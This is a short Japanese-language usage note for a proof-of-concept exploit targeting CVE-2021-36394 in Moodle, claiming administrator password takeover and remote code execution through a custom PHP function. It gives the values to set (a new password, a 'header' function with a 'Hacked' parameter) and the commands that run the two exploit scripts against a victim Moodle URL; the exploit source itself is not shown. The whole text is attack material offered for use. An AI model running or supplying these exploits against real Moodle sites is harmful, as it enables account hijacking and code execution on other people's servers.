
CVE-2021-36394に対する概念実証エクスプロイト(Moodle向け)。カスタムPHP関数を介して管理者パスワードの乗っ取りとリモートコード実行を可能にする。
カスタムコード
$newpassword = "Accounttakedover123";
次に実行:
$ CVE2021-36394.php http://victim/path_to_moodle
カスタムコード
$function = "header"; $param = "Hacked: by0d0ff9";
次に実行:
$ CVE2021-36394_RCE.php http://victim/path_to_moodle